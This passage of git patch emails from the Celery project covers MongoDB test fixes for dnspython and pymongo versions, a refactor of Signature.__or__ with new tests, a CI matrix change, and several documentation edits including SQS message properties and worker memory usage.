- reason="For dnspython version >= 2, pymongo's"
+ reason="For dnspython version > 1, pymongo's"
"srv_resolver calls resolver.resolve")
- def test_init_mongodb_dnspython1_seedlist(self):
+ @pytest.mark.skipif(pymongo.version_tuple[0] > 3,
+ reason="For pymongo version > 3, options returns ssl")
+ def test_init_mongodb_dnspython1_pymongo3_seedlist(self):
resolver = fake_resolver()
self.app.conf.mongodb_backend_settings = None
@@ -169,7 +172,43 @@ def test_init_mongodb_dnspython1_seedlist(self):
@pytest.mark.skipif(dns.version.MAJOR <= 1,
reason="For dnspython versions 1.X, pymongo's"
"srv_resolver calls resolver.query")
- def test_init_mongodb_dnspython2_seedlist(self):
+ @pytest.mark.skipif(pymongo.version_tuple[0] > 3,
+ reason="For pymongo version > 3, options returns ssl")
+ def test_init_mongodb_dnspython2_pymongo3_seedlist(self):
+ resolver = fake_resolver()
+ self.app.conf.mongodb_backend_settings = None
+
+ with patch('dns.resolver.resolve', side_effect=resolver):
+ mb = self.perform_seedlist_assertions()
+ assert mb.options == dict(
+ mb._prepare_client_options(),
+ replicaset='rs0',
+ ssl=True
+ )
+
+ @pytest.mark.skipif(dns.version.MAJOR > 1,
+ reason="For dnspython version >= 2, pymongo's"
+ "srv_resolver calls resolver.resolve")
+ @pytest.mark.skipif(pymongo.version_tuple[0] <= 3,
+ reason="For pymongo version > 3, options returns tls")
+ def test_init_mongodb_dnspython1_pymongo4_seedlist(self):
+ resolver = fake_resolver()
+ self.app.conf.mongodb_backend_settings = None
+
+ with patch('dns.resolver.query', side_effect=resolver):
+ mb = self.perform_seedlist_assertions()
+ assert mb.options == dict(
+ mb._prepare_client_options(),
+ replicaset='rs0',
+ tls=True
+ )
+
+ @pytest.mark.skipif(dns.version.MAJOR <= 1,
+ reason="For dnspython versions 1.X, pymongo's"
+ "srv_resolver calls resolver.query")
+ @pytest.mark.skipif(pymongo.version_tuple[0] <= 3,
+ reason="For pymongo version > 3, options returns tls")
+ def test_init_mongodb_dnspython2_pymongo4_seedlist(self):
resolver = fake_resolver()
self.app.conf.mongodb_backend_settings = None
From ab20d937b32fba65d8902c9d5c2a2849b02898f6 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 19:43:33 +0200
Subject: [PATCH 154/177] Fix fake resolver for dnspython version 2, pymongo
version 4
---
requirements/extras/couchbase.txt | 2 +-
t/unit/backends/test_mongodb.py | 23 ++++++++++++++++++++++-
2 files changed, 23 insertions(+), 2 deletions(-)
diff --git a/requirements/extras/couchbase.txt b/requirements/extras/couchbase.txt
index a736d6a7742..b99329bf1ef 100644
--- a/requirements/extras/couchbase.txt
+++ b/requirements/extras/couchbase.txt
@@ -1 +1 @@
-couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
\ No newline at end of file
+# couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index f93107d76c8..19617559242 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -64,6 +64,27 @@ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
return mock_resolver
+def fake_resolver_dnspython2():
+ Name = pytest.importorskip('dns.name').Name
+ TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
+ SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
+
+ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
+
+ if rdtype == 'SRV':
+ return [
+ SRV(0, 0, 0, 0, 27017, Name(labels=hostname))
+ for hostname in [
+ 'mongo1.example.com'.split('.'),
+ 'mongo2.example.com'.split('.'),
+ 'mongo3.example.com'.split('.')
+ ]
+ ]
+ elif rdtype == 'TXT':
+ return [TXT(0, 0, [b'replicaSet=rs0'])]
+
+ return mock_resolver
+
class test_MongoBackend:
default_url = 'mongodb://uuuu:pwpw@hostname.dom/database'
replica_set_url = (
@@ -209,7 +230,7 @@ def test_init_mongodb_dnspython1_pymongo4_seedlist(self):
@pytest.mark.skipif(pymongo.version_tuple[0] <= 3,
reason="For pymongo version > 3, options returns tls")
def test_init_mongodb_dnspython2_pymongo4_seedlist(self):
- resolver = fake_resolver()
+ resolver = fake_resolver_dnspython2()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.resolve', side_effect=resolver):
From 6a25b0ec6953adef7d3cba4eb1a536abb1831a15 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 20:35:57 +0200
Subject: [PATCH 155/177] Refactor fake resolver for pythondns2.
---
t/unit/backends/test_mongodb.py | 20 +++++++++++---------
1 file changed, 11 insertions(+), 9 deletions(-)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 19617559242..ec9496b7ea9 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -43,7 +43,8 @@
pytest.importorskip('pymongo')
-def fake_resolver():
+
+def fake_resolver_dnspython1():
Name = pytest.importorskip('dns.name').Name
TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
@@ -64,8 +65,9 @@ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
return mock_resolver
+
def fake_resolver_dnspython2():
- Name = pytest.importorskip('dns.name').Name
+ name_from_text = pytest.importorskip('dns.name').from_text
TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
@@ -73,11 +75,11 @@ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
if rdtype == 'SRV':
return [
- SRV(0, 0, 0, 0, 27017, Name(labels=hostname))
+ SRV(0, 0, 0, 0, 27017, name_from_text(hostname))
for hostname in [
- 'mongo1.example.com'.split('.'),
- 'mongo2.example.com'.split('.'),
- 'mongo3.example.com'.split('.')
+ 'mongo1.example.com',
+ 'mongo2.example.com',
+ 'mongo3.example.com'
]
]
elif rdtype == 'TXT':
@@ -179,7 +181,7 @@ def test_init_with_settings(self):
@pytest.mark.skipif(pymongo.version_tuple[0] > 3,
reason="For pymongo version > 3, options returns ssl")
def test_init_mongodb_dnspython1_pymongo3_seedlist(self):
- resolver = fake_resolver()
+ resolver = fake_resolver_dnspython1()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.query', side_effect=resolver):
@@ -196,7 +198,7 @@ def test_init_mongodb_dnspython1_pymongo3_seedlist(self):
@pytest.mark.skipif(pymongo.version_tuple[0] > 3,
reason="For pymongo version > 3, options returns ssl")
def test_init_mongodb_dnspython2_pymongo3_seedlist(self):
- resolver = fake_resolver()
+ resolver = fake_resolver_dnspython1()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.resolve', side_effect=resolver):
@@ -213,7 +215,7 @@ def test_init_mongodb_dnspython2_pymongo3_seedlist(self):
@pytest.mark.skipif(pymongo.version_tuple[0] <= 3,
reason="For pymongo version > 3, options returns tls")
def test_init_mongodb_dnspython1_pymongo4_seedlist(self):
- resolver = fake_resolver()
+ resolver = fake_resolver_dnspython1()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.query', side_effect=resolver):
From 9a4e0ec0144b8dfb85cd8e8954d842830a38e569 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 20:49:09 +0200
Subject: [PATCH 156/177] restore couchbase dep
---
requirements/extras/couchbase.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/extras/couchbase.txt b/requirements/extras/couchbase.txt
index b99329bf1ef..a86b71297ab 100644
--- a/requirements/extras/couchbase.txt
+++ b/requirements/extras/couchbase.txt
@@ -1 +1 @@
-# couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
+couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
From 113533c6e85340f3da8bdcae618e091295e6ce87 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 30 Nov 2021 20:56:57 +0200
Subject: [PATCH 157/177] Try to use a str object. (#7131)
---
t/unit/backends/test_mongodb.py | 35 ++++++---------------------------
1 file changed, 6 insertions(+), 29 deletions(-)
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index ec9496b7ea9..0725d04629b 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -44,8 +44,7 @@
pytest.importorskip('pymongo')
-def fake_resolver_dnspython1():
- Name = pytest.importorskip('dns.name').Name
+def fake_resolver_dnspython():
TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
@@ -53,29 +52,7 @@ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
if rdtype == 'SRV':
return [
- SRV(0, 0, 0, 0, 27017, Name(labels=hostname))
- for hostname in [
- b'mongo1.example.com'.split(b'.'),
- b'mongo2.example.com'.split(b'.'),
- b'mongo3.example.com'.split(b'.')
- ]
- ]
- elif rdtype == 'TXT':
- return [TXT(0, 0, [b'replicaSet=rs0'])]
-
- return mock_resolver
-
-
-def fake_resolver_dnspython2():
- name_from_text = pytest.importorskip('dns.name').from_text
- TXT = pytest.importorskip('dns.rdtypes.ANY.TXT').TXT
- SRV = pytest.importorskip('dns.rdtypes.IN.SRV').SRV
-
- def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
-
- if rdtype == 'SRV':
- return [
- SRV(0, 0, 0, 0, 27017, name_from_text(hostname))
+ SRV(0, 0, 0, 0, 27017, hostname)
for hostname in [
'mongo1.example.com',
'mongo2.example.com',
@@ -181,7 +158,7 @@ def test_init_with_settings(self):
@pytest.mark.skipif(pymongo.version_tuple[0] > 3,
reason="For pymongo version > 3, options returns ssl")
def test_init_mongodb_dnspython1_pymongo3_seedlist(self):
- resolver = fake_resolver_dnspython1()
+ resolver = fake_resolver_dnspython()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.query', side_effect=resolver):
@@ -198,7 +175,7 @@ def test_init_mongodb_dnspython1_pymongo3_seedlist(self):
@pytest.mark.skipif(pymongo.version_tuple[0] > 3,
reason="For pymongo version > 3, options returns ssl")
def test_init_mongodb_dnspython2_pymongo3_seedlist(self):
- resolver = fake_resolver_dnspython1()
+ resolver = fake_resolver_dnspython()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.resolve', side_effect=resolver):
@@ -215,7 +192,7 @@ def test_init_mongodb_dnspython2_pymongo3_seedlist(self):
@pytest.mark.skipif(pymongo.version_tuple[0] <= 3,
reason="For pymongo version > 3, options returns tls")
def test_init_mongodb_dnspython1_pymongo4_seedlist(self):
- resolver = fake_resolver_dnspython1()
+ resolver = fake_resolver_dnspython()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.query', side_effect=resolver):
@@ -232,7 +209,7 @@ def test_init_mongodb_dnspython1_pymongo4_seedlist(self):
@pytest.mark.skipif(pymongo.version_tuple[0] <= 3,
reason="For pymongo version > 3, options returns tls")
def test_init_mongodb_dnspython2_pymongo4_seedlist(self):
- resolver = fake_resolver_dnspython2()
+ resolver = fake_resolver_dnspython()
self.app.conf.mongodb_backend_settings = None
with patch('dns.resolver.resolve', side_effect=resolver):
From 1814e03a87962d2fe7237532c90d03e9c7ffd331 Mon Sep 17 00:00:00 2001
From: Karol Alvarado <33376742+Koressi@users.noreply.github.com>
Date: Mon, 6 Dec 2021 06:01:02 +0100
Subject: [PATCH 158/177] Add missing space. (#7133)
---
celery/bin/worker.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/celery/bin/worker.py b/celery/bin/worker.py
index 16fffcc794d..f0629fcaf52 100644
--- a/celery/bin/worker.py
+++ b/celery/bin/worker.py
@@ -182,7 +182,7 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
value: value or ctx.obj.app.conf.worker_prefetch_multiplier,
cls=CeleryOption,
help_group="Worker Options",
- help="Set custom prefetch multiplier value"
+ help="Set custom prefetch multiplier value "
"for this worker instance.")
@click.option('-c',
'--concurrency',
From 6fb4f9f62801ce33dd4dc95f79d53893d6e35208 Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Mon, 6 Dec 2021 21:02:51 +0200
Subject: [PATCH 159/177] Exclude pypy-windows checks from CI temporarily
(#7146)
* Fix flake8 error.
* Exclude pypy-windows checks from CI temporarily
---
.github/workflows/python-package.yml | 6 +++++-
t/unit/backends/test_mongodb.py | 19 ++++++++++---------
2 files changed, 15 insertions(+), 10 deletions(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index 575650afff1..bb2ed26d003 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -28,7 +28,11 @@ jobs:
matrix:
python-version: ['3.7', '3.8', '3.9', '3.10', 'pypy-3.7', 'pypy-3.8']
os: ["ubuntu-20.04", "windows-latest"]
-
+ exclude:
+ - python-version: 'pypy-3.7'
+ os: "windows-latest"
+ - python-version: 'pypy-3.8'
+ os: "windows-latest"
steps:
- name: Install apt packages
if: startsWith(matrix.os, 'ubuntu-')
diff --git a/t/unit/backends/test_mongodb.py b/t/unit/backends/test_mongodb.py
index 0725d04629b..c15ded834f1 100644
--- a/t/unit/backends/test_mongodb.py
+++ b/t/unit/backends/test_mongodb.py
@@ -29,14 +29,14 @@
MONGODB_GROUP_COLLECTION = 'group_collection1'
# uri with user, password, database name, replica set, DNS seedlist format
MONGODB_SEEDLIST_URI = ('srv://'
- 'celeryuser:celerypassword@'
- 'dns-seedlist-host.example.com/'
- 'celerydatabase')
+ 'celeryuser:celerypassword@'
+ 'dns-seedlist-host.example.com/'
+ 'celerydatabase')
MONGODB_BACKEND_HOST = [
- 'mongo1.example.com:27017',
- 'mongo2.example.com:27017',
- 'mongo3.example.com:27017',
- ]
+ 'mongo1.example.com:27017',
+ 'mongo2.example.com:27017',
+ 'mongo3.example.com:27017',
+]
CELERY_USER = 'celeryuser'
CELERY_PASSWORD = 'celerypassword'
CELERY_DATABASE = 'celerydatabase'
@@ -64,6 +64,7 @@ def mock_resolver(_, rdtype, rdclass=None, lifetime=None, **kwargs):
return mock_resolver
+
class test_MongoBackend:
default_url = 'mongodb://uuuu:pwpw@hostname.dom/database'
replica_set_url = (
@@ -235,7 +236,7 @@ def test_ensure_mongodb_uri_compliance(self):
assert compliant_uri('mongodb://') == 'mongodb://localhost'
assert compliant_uri('mongodb+something://host') == \
- 'mongodb+something://host'
+ 'mongodb+something://host'
assert compliant_uri('something://host') == 'mongodb+something://host'
@@ -694,7 +695,7 @@ def find_one(self, task_id):
@pytest.mark.parametrize("serializer,result_type,result", [
(s, type(i['result']), i['result']) for i in SUCCESS_RESULT_TEST_DATA
for s in i['serializers']]
- )
+ )
def test_encode_success_results(self, mongo_backend_factory, serializer,
result_type, result):
backend = mongo_backend_factory(serializer=serializer)
From 8ba6f7438b8b4fc10531f37cf550526fe8fb7922 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Viktor=20K=C3=A1lm=C3=A1n?=
Date: Fri, 10 Dec 2021 12:44:47 +0100
Subject: [PATCH 160/177] update doc to reflect Celery 5.2.x (#7153)
* update doc to reflect Celery 5.2.x
* Mention 3.10 as well.
Co-authored-by: Asif Saif Uddin
* Fix formatting.
* update
Co-authored-by: Omer Katz
Co-authored-by: Asif Saif Uddin
---
docs/getting-started/introduction.rst | 7 ++++---
1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/docs/getting-started/introduction.rst b/docs/getting-started/introduction.rst
index a57086df8bc..2797ce60097 100644
--- a/docs/getting-started/introduction.rst
+++ b/docs/getting-started/introduction.rst
@@ -39,14 +39,15 @@ What do I need?
===============
.. sidebar:: Version Requirements
- :subtitle: Celery version 5.1 runs on
+ :subtitle: Celery version 5.2 runs on
- - Python ❨3.6, 3.7, 3.8❩
- - PyPy3.6 ❨7.3❩
+ - Python ❨3.7, 3.8, 3.9, 3.10❩
+ - PyPy3.7, 3.8 ❨7.3.7❩
Celery 4.x was the last version to support Python 2.7,
Celery 5.x requires Python 3.6 or newer.
Celery 5.1.x also requires Python 3.6 or newer.
+ Celery 5.2.x requires Python 3.7 or newer.
If you're running an older version of Python, you need to be running
From 9c06002f8c63ae9cb4a9cfffff356f5eccd73dfb Mon Sep 17 00:00:00 2001
From: Ava Thorn
Date: Sun, 12 Dec 2021 06:15:29 -0500
Subject: [PATCH 161/177] Update configuration.rst
Fix typo causing syntax error in documentation
---
docs/userguide/configuration.rst | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/userguide/configuration.rst b/docs/userguide/configuration.rst
index 0d7d7554d0a..52797df39fe 100644
--- a/docs/userguide/configuration.rst
+++ b/docs/userguide/configuration.rst
@@ -2182,7 +2182,7 @@ Examples:
},
}
- task_routes = ('myapp.tasks.route_task', {'celery.ping': 'default})
+ task_routes = ('myapp.tasks.route_task', {'celery.ping': 'default'})
Where ``myapp.tasks.route_task`` could be:
From 314a70498b164fbfdc5805ae31e4d91be9931b8b Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 14 Dec 2021 21:00:56 +0600
Subject: [PATCH 162/177] bump python 3.10.1 in pyenv
---
docker/scripts/install-pyenv.sh | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docker/scripts/install-pyenv.sh b/docker/scripts/install-pyenv.sh
index dcf5f2a6d63..76a127ed35f 100644
--- a/docker/scripts/install-pyenv.sh
+++ b/docker/scripts/install-pyenv.sh
@@ -7,7 +7,7 @@ curl -L https://raw.githubusercontent.com/pyenv/pyenv-installer/master/bin/pyenv
git clone https://github.com/s1341/pyenv-alias.git $(pyenv root)/plugins/pyenv-alias
# Python versions to test against
-VERSION_ALIAS="python3.10" pyenv install 3.10.0
+VERSION_ALIAS="python3.10" pyenv install 3.10.1
VERSION_ALIAS="python3.7" pyenv install 3.7.12
VERSION_ALIAS="python3.8" pyenv install 3.8.12
VERSION_ALIAS="python3.9" pyenv install 3.9.9
From 0442761fb6b4d7cef82b49f9f302821576365b5a Mon Sep 17 00:00:00 2001
From: n0061q <95093640+n0061q@users.noreply.github.com>
Date: Tue, 14 Dec 2021 18:10:21 +0200
Subject: [PATCH 163/177] Docs for SQS: setting additional message properties
(#7167)
* fix code block formatting
* SQS docs - additional message properties
---
docs/getting-started/backends-and-brokers/sqs.rst | 15 ++++++++++++++-
1 file changed, 14 insertions(+), 1 deletion(-)
diff --git a/docs/getting-started/backends-and-brokers/sqs.rst b/docs/getting-started/backends-and-brokers/sqs.rst
index cd8fd2a3b33..f7ea2fe3ac8 100644
--- a/docs/getting-started/backends-and-brokers/sqs.rst
+++ b/docs/getting-started/backends-and-brokers/sqs.rst
@@ -198,7 +198,7 @@ STS token authentication
https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html
AWS STS authentication is supported by using the ``sts_role_arn`` and ``sts_token_timeout`` broker transport options. ``sts_role_arn`` is the assumed IAM role ARN we use to authorize our access to SQS.
-``sts_token_timeout`` is the token timeout, defaults (and minimum) to 900 seconds. After the mentioned period, a new token will be created.
+``sts_token_timeout`` is the token timeout, defaults (and minimum) to 900 seconds. After the mentioned period, a new token will be created::
broker_transport_options = {
'predefined_queues': {
@@ -249,6 +249,19 @@ Caveats
:program:`celery events`, :program:`celerymon`, or the Django Admin
monitor.
+- With FIFO queues it might be necessary to set additional message properties such as ``MessageGroupId`` and ``MessageDeduplicationId`` when publishing a message.
+
+ Message properties can be passed as keyword arguments to :meth:`~celery.app.task.Task.apply_async`:
+
+ .. code-block:: python
+
+ message_properties = {
+ 'MessageGroupId': '',
+ 'MessageDeduplicationId': ''
+ }
+ task.apply_async(**message_properties)
+
+
.. _sqs-results-configuration:
Results
From cbdebaec1cb6907f4223ba46b31e02640f3846c2 Mon Sep 17 00:00:00 2001
From: Skonik
Date: Thu, 16 Dec 2021 11:50:34 +0300
Subject: [PATCH 164/177] docs: add sqs broker url setup warning
---
.../backends-and-brokers/sqs.rst | 17 ++++++++++++++---
1 file changed, 14 insertions(+), 3 deletions(-)
diff --git a/docs/getting-started/backends-and-brokers/sqs.rst b/docs/getting-started/backends-and-brokers/sqs.rst
index f7ea2fe3ac8..ae5e2ff9d17 100644
--- a/docs/getting-started/backends-and-brokers/sqs.rst
+++ b/docs/getting-started/backends-and-brokers/sqs.rst
@@ -38,14 +38,25 @@ encode the password so it can always be parsed correctly. For example:
.. code-block:: python
from kombu.utils.url import safequote
-
+
aws_access_key = safequote("ABCDEFGHIJKLMNOPQRST")
aws_secret_key = safequote("ZYXK7NiynG/TogH8Nj+P9nlE73sq3")
-
+
broker_url = "sqs://{aws_access_key}:{aws_secret_key}@".format(
aws_access_key=aws_access_key, aws_secret_key=aws_secret_key,
)
+.. warning::
+
+ Don't use this setup option with django's ``debug=True``.
+ It may lead to security issues within deployed django apps.
+
+ In debug mode django shows environment variables and the SQS URL
+ may be exposed to the internet including your AWS access and secret keys.
+ Please turn off debug mode on your deployed django application or
+ consider a setup option described below.
+
+
The login credentials can also be set using the environment variables
:envvar:`AWS_ACCESS_KEY_ID` and :envvar:`AWS_SECRET_ACCESS_KEY`,
in that case the broker URL may only be ``sqs://``.
@@ -252,7 +263,7 @@ Caveats
- With FIFO queues it might be necessary to set additional message properties such as ``MessageGroupId`` and ``MessageDeduplicationId`` when publishing a message.
Message properties can be passed as keyword arguments to :meth:`~celery.app.task.Task.apply_async`:
-
+
.. code-block:: python
message_properties = {
From 83869da17d4214014f41b6e57271de23f808f1f8 Mon Sep 17 00:00:00 2001
From: Laszlo
Date: Sat, 18 Dec 2021 05:13:06 +0100
Subject: [PATCH 165/177] Split Signature.__or__ into subclasses' __or__
(#7135)
* move group | signature
* reorder conditions
* move chain | group
* reorder conditions
* reorder conditions
* move chain | chain
* reorder conditions
* move chord | task (if task is neither group nor chain)
* reorder conditions
* reorder conditions
* move chain | not-group-or-chain
* reorder conditions
* fix: chord | non-signature
* remove obsolete comment
* test: chord | chain and chord | group
Co-authored-by: Laszlo Treszkai
Co-authored-by: Laszlo Treszkai
---
celery/canvas.py | 95 ++++++++++++++++++++-----------------
t/unit/tasks/test_canvas.py | 21 ++++++++
2 files changed, 73 insertions(+), 43 deletions(-)
diff --git a/celery/canvas.py b/celery/canvas.py
index f0bcd2c5260..e0b55389288 100644
--- a/celery/canvas.py
+++ b/celery/canvas.py
@@ -394,55 +394,16 @@ def flatten_links(self):
)))
def __or__(self, other):
- # These could be implemented in each individual class,
- # I'm sure, but for now we have this.
- if isinstance(self, group):
- # group() | task -> chord
- return chord(self, body=other, app=self._app)
+ if isinstance(other, _chain):
+ # task | chain -> chain
+ return _chain(seq_concat_seq(
+ (self,), other.unchain_tasks()), app=self._app)
elif isinstance(other, group):
# unroll group with one member
other = maybe_unroll_group(other)
- if isinstance(self, _chain):
- # chain | group() -> chain
- tasks = self.unchain_tasks()
- if not tasks:
- # If the chain is empty, return the group
- return other
- return _chain(seq_concat_item(
- tasks, other), app=self._app)
# task | group() -> chain
return _chain(self, other, app=self.app)
-
- if not isinstance(self, _chain) and isinstance(other, _chain):
- # task | chain -> chain
- return _chain(seq_concat_seq(
- (self,), other.unchain_tasks()), app=self._app)
- elif isinstance(other, _chain):
- # chain | chain -> chain
- return _chain(seq_concat_seq(
- self.unchain_tasks(), other.unchain_tasks()), app=self._app)
- elif isinstance(self, chord):
- # chord | task -> attach to body
- sig = self.clone()
- sig.body = sig.body | other
- return sig
elif isinstance(other, Signature):
- if isinstance(self, _chain):
- if self.tasks and isinstance(self.tasks[-1], group):
- # CHAIN [last item is group] | TASK -> chord
- sig = self.clone()
- sig.tasks[-1] = chord(
- sig.tasks[-1], other, app=self._app)
- return sig
- elif self.tasks and isinstance(self.tasks[-1], chord):
- # CHAIN [last item is chord] -> chain with chord body.
- sig = self.clone()
- sig.tasks[-1].body = sig.tasks[-1].body | other
- return sig
- else:
- # chain | task -> chain
- return _chain(seq_concat_item(
- self.unchain_tasks(), other), app=self._app)
# task | task -> chain
return _chain(self, other, app=self._app)
return NotImplemented
@@ -613,6 +574,40 @@ def __call__(self, *args, **kwargs):
if self.tasks:
return self.apply_async(args, kwargs)
+ def __or__(self, other):
+ if isinstance(other, group):
+ # unroll group with one member
+ other = maybe_unroll_group(other)
+ # chain | group() -> chain
+ tasks = self.unchain_tasks()
+ if not tasks:
+ # If the chain is empty, return the group
+ return other
+ return _chain(seq_concat_item(
+ tasks, other), app=self._app)
+ elif isinstance(other, _chain):
+ # chain | chain -> chain
+ return _chain(seq_concat_seq(
+ self.unchain_tasks(), other.unchain_tasks()), app=self._app)
+ elif isinstance(other, Signature):
+ if self.tasks and isinstance(self.tasks[-1], group):
+ # CHAIN [last item is group] | TASK -> chord
+ sig = self.clone()
+ sig.tasks[-1] = chord(
+ sig.tasks[-1], other, app=self._app)
+ return sig
+ elif self.tasks and isinstance(self.tasks[-1], chord):
+ # CHAIN [last item is chord] -> chain with chord body.
+ sig = self.clone()
+ sig.tasks[-1].body = sig.tasks[-1].body | other
+ return sig
+ else:
+ # chain | task -> chain
+ return _chain(seq_concat_item(
+ self.unchain_tasks(), other), app=self._app)
+ else:
+ return NotImplemented
+
def clone(self, *args, **kwargs):
to_signature = maybe_signature
signature = super().clone(*args, **kwargs)
@@ -1071,6 +1066,10 @@ def __init__(self, *tasks, **options):
def __call__(self, *partial_args, **options):
return self.apply_async(partial_args, **options)
+ def __or__(self, other):
+ # group() | task -> chord
+ return chord(self, body=other, app=self._app)
+
def skew(self, start=1.0, stop=None, step=1.0):
it = fxrange(start, stop, step, repeatlast=True)
for task in self.tasks:
@@ -1377,6 +1376,16 @@ def __init__(self, header, body=None, task='celery.chord',
def __call__(self, body=None, **options):
return self.apply_async((), {'body': body} if body else {}, **options)
+ def __or__(self, other):
+ if (not isinstance(other, (group, _chain)) and
+ isinstance(other, Signature)):
+ # chord | task -> attach to body
+ sig = self.clone()
+ sig.body = sig.body | other
+ return sig
+ else:
+ return super().__or__(other)
+
def freeze(self, _id=None, group_id=None, chord=None,
root_id=None, parent_id=None, group_index=None):
# pylint: disable=redefined-outer-name
diff --git a/t/unit/tasks/test_canvas.py b/t/unit/tasks/test_canvas.py
index ca2d0384257..bf9e60599c5 100644
--- a/t/unit/tasks/test_canvas.py
+++ b/t/unit/tasks/test_canvas.py
@@ -402,6 +402,27 @@ def test_group_to_chord__protocol_2(self):
tasks2, _ = c2.prepare_steps((), {}, c2.tasks)
assert isinstance(tasks2[0], group)
+ def test_chord_to_chain(self):
+ c = (
+ chord([self.add.s('x0', 'y0'), self.add.s('x1', 'y1')],
+ self.add.s(['foo'])) |
+ chain(self.add.s(['y']), self.add.s(['z']))
+ )
+ assert isinstance(c, _chain)
+ assert c.apply().get() == ['x0y0', 'x1y1', 'foo', 'y', 'z']
+
+ def test_chord_to_group(self):
+ c = (
+ chord([self.add.s('x0', 'y0'), self.add.s('x1', 'y1')],
+ self.add.s(['foo'])) |
+ group([self.add.s(['y']), self.add.s(['z'])])
+ )
+ assert isinstance(c, _chain)
+ assert c.apply().get() == [
+ ['x0y0', 'x1y1', 'foo', 'y'],
+ ['x0y0', 'x1y1', 'foo', 'z']
+ ]
+
def test_apply_options(self):
class static(Signature):
From 843396e956b21f8815f1a4a71d347ba45a1008e6 Mon Sep 17 00:00:00 2001
From: Sadegh
Date: Wed, 22 Dec 2021 21:41:50 +0100
Subject: [PATCH 166/177] Fix typo in documentation
`CELERY_CACHE_BACKEND` is the right property for cache backend, not `CELERY_RESULT_BACKEND`
---
docs/django/first-steps-with-django.rst | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/django/first-steps-with-django.rst b/docs/django/first-steps-with-django.rst
index 2b402c8a505..9c9a2f5bc8f 100644
--- a/docs/django/first-steps-with-django.rst
+++ b/docs/django/first-steps-with-django.rst
@@ -201,7 +201,7 @@ To use this with your project you need to follow these steps:
.. code-block:: python
- CELERY_RESULT_BACKEND = 'django-cache'
+ CELERY_CACHE_BACKEND = 'django-cache'
We can also use the cache defined in the CACHES setting in django.
From c506f45926b40c041bfbe5147e3a3e59a9751435 Mon Sep 17 00:00:00 2001
From: Paul Brown
Date: Sat, 25 Dec 2021 07:27:53 +0000
Subject: [PATCH 167/177] add memory usage section to optimizing docs (#7186)
* add memory usage section to optimizing docs
* add example of too low max tasks per child
---
docs/userguide/optimizing.rst | 32 ++++++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
diff --git a/docs/userguide/optimizing.rst b/docs/userguide/optimizing.rst
index ab293e67bce..4372f3af199 100644
--- a/docs/userguide/optimizing.rst
+++ b/docs/userguide/optimizing.rst
@@ -179,6 +179,38 @@ You can enable this behavior by using the following configuration options:
task_acks_late = True
worker_prefetch_multiplier = 1
+Memory Usage
+------------
+
+If you are experiencing high memory usage on a prefork worker, first you need
+to determine whether the issue is also happening on the Celery master
+process. The Celery master process's memory usage should not continue to
+increase drastically after start-up. If you see this happening, it may indicate
+a memory leak bug which should be reported to the Celery issue tracker.
+
+If only your child processes have high memory usage, this indicates an issue
+with your task.
+
+Keep in mind, Python process memory usage has a "high watermark" and will not
+return memory to the operating system until the child process has stopped. This
+means a single high memory usage task could permanently increase the memory
+usage of a child process until it's restarted. Fixing this may require adding
+chunking logic to your task to reduce peak memory usage.
+
+Celery workers have two main ways to help reduce memory usage due to the "high
+watermark" and/or memory leaks in child processes: the
